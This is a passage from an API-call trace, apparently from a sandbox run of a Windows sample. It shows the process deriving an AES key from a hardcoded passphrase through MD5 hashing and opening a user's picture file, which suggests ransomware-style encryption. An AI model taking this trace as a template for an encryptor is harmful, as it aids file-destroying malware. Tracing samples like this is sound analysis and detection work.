lpMsg=0x144ebfc) returned 0 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0090.362] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2280 | out: hHeap=0x1780000) returned 1 [0090.363] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9bd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0090.363] CloseHandle (hObject=0x258) returned 1 [0090.363] FreeLibrary (hLibModule=0x772d0000) returned 1 [0090.363] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0090.363] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\wWIF_SR6x0w3shayx.jpg", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2c02b90, ftCreationTime.dwHighDateTime=0x1d5e2ee, ftLastAccessTime.dwLowDateTime=0xa75c3350, ftLastAccessTime.dwHighDateTime=0x1d5e674, ftLastWriteTime.dwLowDateTime=0xa75c3350, ftLastWriteTime.dwHighDateTime=0x1d5e674, nFileSizeHigh=0x0, nFileSizeLow=0x167bc, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="wWIF_SR6x0w3shayx.jpg", cAlternateFileName="WWIF_S~1.JPG")) returned 0x41ac540 [0090.363] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0090.364] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0090.364] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0090.364] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0090.364] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.364] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0090.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0090.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0090.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0090.364] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0090.365] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0090.365] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0090.365] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0090.365] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0090.365] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0090.365] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0090.365] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.365] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0090.365] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0090.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca550, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0090.365] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0090.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0090.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0090.365] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0090.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0090.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2668, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0090.365] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.365] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0090.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca508, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0090.366] CryptHashData (hHash=0x41ac2c0, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0090.366] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.366] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0090.366] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0090.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca760, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0090.366] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac2c0, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac600) returned 1 [0090.366] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.366] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0090.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0090.366] CryptDestroyHash (hHash=0x41ac2c0) returned 1 [0090.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0090.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0090.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0090.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0090.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0090.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0090.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0090.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0090.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0090.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0090.366] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0090.367] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0090.367] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0090.367] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0090.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0090.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0090.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0090.368] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\wWIF_SR6x0w3shayx.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\wwif_sr6x0w3shayx.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0090.368] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.368] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0090.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0090.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0090.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0090.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0090.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0090.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0090.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0090.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.368] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0090.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0090.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0090.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0090.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0090.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0090.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0090.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0090.368] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0090.369] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0090.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0090.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0090.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0090.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0090.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0090.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0090.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0090.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0090.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0090.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0090.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0090.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0090.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0090.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0090.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0090.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0090.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0090.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0090.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0090.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0090.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0090.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0090.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0090.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0090.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0090.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0090.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0090.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0090.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431de60 [0090.370] HeapFree (in: 